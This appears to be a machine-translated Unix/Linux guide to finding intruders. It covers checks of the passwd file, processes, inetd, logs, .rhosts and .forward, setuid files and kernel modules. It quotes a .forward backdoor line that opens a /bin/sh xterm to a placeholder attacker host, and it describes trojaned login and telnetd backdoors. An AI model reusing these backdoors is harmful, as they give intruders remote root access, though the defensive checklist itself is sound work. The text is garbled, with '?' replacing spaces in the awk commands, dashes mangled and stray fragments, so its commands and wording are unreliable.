1. Check the system password file
First start with the obvious, check the passwd file, ls –l /etc/passwd to check the date of file modification.
Check which privileged users are in the passwd file. Users with uid 0 in the system will be displayed.
1
awk –F:'$3==0?{print?$1}'?/etc/passwd
By the way, check again whether there is an account with a blank password in the system:
1
awk – F: 'length($2)==0?{print?$1}'?/etc/shadow
2. Check the process and see Check if there are any strange processes
Focus on the process: ps –aef | grep inetd
inetd is the daemon process of UNIX system. The pid of normal inetd is relatively high. If you When you see a process similar to inetd –s /tmp/.xxx being output, focus on the content after inetd –s. Under normal circumstances, there is no -s parameter after the inetd service in the LINUX system, and of course inetd is not used to start a certain file; in the solaris system, there is only inetd –s, and inetd is not used to start a specific file. file; if you use the ps command to see that inetd starts a certain file, but you do not use inetd to start this file, it means that someone has invaded your system and opened a simple backdoor with root privileges.
Enter ps –aef to check the output information, especially pay attention to whether there are processes starting with ./xxx. Once a strange process is found, after checking the backdoor program left by the intruder, immediately run kill -9 pid to kill the process, and then run ps -aef to see if the process has been killed; once such a process appears, kill it The phenomenon of restarting later proves that someone has placed a script to automatically start the program on the system. At this time, you need to search carefully: find / -name program name – print. Assuming that the system is really placed by an intruder with a backdoor, you will find a lot of interesting stuff according to the directory where the found program is located.
Hidden processes under UNIX are sometimes done by replacing ps files. Detecting this method involves checking file integrity. We will discuss this method later.
Next, trace the intruder step by step based on the file directory found on the server.
3. Check the system daemon process
Check the /etc/inetd.conf file, enter: cat /etc/inetd.conf | grep –v "^#", the output information It is the remote service started by your machine.
Generally, an intruder can create a backdoor by directly replacing the in.xxx program, such as replacing in.telnetd with /bin/sh, and then restarting the inetd service. Then all users who telnet to the server will Get a rootshell directly without entering username and password.
4. Check the network connection and listening ports
Enter netstat -an to list all connections and listening ports on the machine and check whether there are any illegal connections.
Enter netstat –rn to check whether the routing and gateway settings of this machine are correct.
Enter ifconfig –a to view the network card settings.
5. Check the system log
Command last | more to view the history of all users who logged in to the machine under normal circumstances. However, the last command relies on the syslog process, which has become an important target for intruder attacks. Intruders usually stop the system's syslog, check the system syslog process, and determine whether the last time syslog was started is normal. Because syslog is executed as root, if it is found that the syslog has been illegally touched, it means there is a major intrusion event. .
Enter ls –al /var/log under Linux
Enter ls –al /var/adm under solaris
Check wtmp utmp, including messgae, etc. Check whether the integrity and modification time of the file are normal. This is also a way to manually erase traces of intrusion.
6. Check the core file in the system
Invading the system by sending malformed requests to attack a certain service of the server is a conventional intrusion method. A typical RPC attack is through this way.
This method has a certain success rate, which means that it cannot 100% guarantee successful intrusion into the system, and usually generates a core file in the corresponding directory of the server. To globally search for the core file in the system, enter find / -name core –exec ls –l {} \; According to the directory where the core is located, query the core file to determine whether there is an intrusion.
7. .rhosts and .forward
These are two well-known backdoor files. If you want to check whether your system has been installed by an intruder, you may wish to search for these two files globally. files:
find / -name “.rhosts” –print
find / -name “.forward” –print
In a user’s $HOME It is very dangerous if the .rhosts file contains only two + signs. If port 513 (rlogin port, which has the same function as telnet) is opened on your system, then anyone can log in to your system using this user. without any verification.
If you see this and want to do in-depth security reinforcement services and security deployment
You must find a security company that specializes in server processing. In China, Sine Security and NSFOCUS can compare. Professionally provided.
Putting commands in the .forward file under Unix is ??a common method to regain access. The .forward under a certain user's $HOME may be set as follows:
\username|"/ usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 –e /bin/sh"
Variations of this method include changing the system's mail alias file (usually located in /etc /aliases). Note that this is just a simple transformation. More advanced ones can run a simple script from .forward to execute arbitrary commands on standard input (after a small amount of preprocessing). Using smrsh can effectively prevent this backdoor ( Although if you allow elm's filter or procmail programs to run automatically, there may still be problems. Under Solaris system, if you run the following command:
ln -s /var/mail/luser ~/ .forward
Then set vacation to be valid, then /var/mail/luser will be copied to ~/.forward, and "|/usr/bin/vacation me" will be appended, and the old symlink will be moved Go to ~/.forward..BACKUP.
You can also delete these two files directly.
8. Check the integrity of the system files.
Check the files. There are many ways to ensure the integrity of the file. Usually we query and compare files by entering ls -l file name. Although this method is simple, it still has certain practicality, but it is more troublesome if the ls files have been replaced. Under LINUX, you can use rpm -V `rpm -qf file name` to query. Whether the country query result is normal can determine whether the file is complete. There are many ways to use rpm to check the integrity of the file under LINUX, not all here. To go into details, you can use man rpm to obtain more formats.
In UNIX systems, /bin/login is a file that is often replaced by intruders as a backdoor. Let’s talk about the login backdoor:
< In p>UNIX, the Login program is usually used to verify the password of users coming from Telnet. The intruder obtains the login source code and modifies it so that it checks the backdoor password first when comparing the input password with the stored password. , it will ignore the password set by the administrator and let you drive straight in: this will allow the intruder to enter any account, even the root directory. Since the backdoor password is an access generated before the user actually logs in and is logged to utmp and wtmP. An intruder can log in and obtain a shell without exposing the account. After the administrator noticed this backdoor, he used the "strings" command to search the login program for text messages. In many cases, backdoor passwords are revealed for what they are. The intruder will start to encrypt or change the hidden password, making the strings command invalid. So many administrators use MD5 checksums to detect this backdoor. There is the md5sum command in UNIX systems. Enter the md5sum file name to check the md5 signature of the file. Its usage format is as follows: md5sum -b reads the file in binary mode; md5sum -c reversely checks the MD5 signature; md5sum -t reads the file in text mode.As mentioned before, the daemon process needs to be carefully compared with the uncommented lines in the daemon configuration file inetd.conf. For a simple example, if you enable the telnet service, the daemon process There will be a sentence in the configuration file: telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd
You can see that the file it uses is /usr/sbin/in.telnetd, check The integrity of this file, intruders often create a backdoor for themselves by replacing allowed service files in the daemon process.
/etc/crontab in LINUX system is also a file often used by intruders. To check the integrity of the file, you can directly cat /etc/crontab and read carefully whether the file has been used by intruders. to do other things.
The method of directly using a process to start the backdoor without replacing the login and other files has a flaw, that is, once the system is restarted, the process will be killed, so the backdoor must be allowed to run when the system starts. Start up. We usually check the files under /etc/rc.d to see if there is a backdoor program when the system starts. Why is this method a bit like checking for trojan under windows?
Speaking of this, let me mention that if a file with the following attributes is found in a certain directory: -rwsr-xr-x 1 root root xxx .sh, this indicates that any user can run this after entering Each file can obtain a rootshell, which is the setuid file. Run find –perm 4000 –print to perform a global search for such files and then delete such files.
9. Check for kernel-level backdoors
If someone installs this kind of backdoor on your system, it is usually quite annoying. I often think about it when encountering this kind of situation. Let’s forget about reinstalling the system. Let’s get back to the point. First, check the modules loaded by the system. Use the lsmod command under the LINUX system and the modinfo command under the solaris system to view it. What needs to be explained here is that generally the LINUX installed by default loads fewer modules, usually the network card driver; while under Solaris, there are many, so there is no other way but to analyze them one by one. After the kernel is hardened, the insertion or removal of modules should be prohibited to protect the security of the system, otherwise intruders may replace system calls again. We can achieve the above purpose by replacing create_module() and delete_module(). In addition, hardening modules for this kernel should be done as early as possible to prevent system calls from being replaced by intruders. If the system is loaded with backdoor modules, but you cannot see them in the module list /proc/module, you may have used a hack tool to remove the loaded modules. The famous knark toolkit has a tool to remove loaded modules. . When this happens, you need to carefully search the /proc directory and determine the hidden and disguised processes based on the files found and experience. The Knark backdoor module is in the /proc/knark directory. Of course, this directory may be hidden.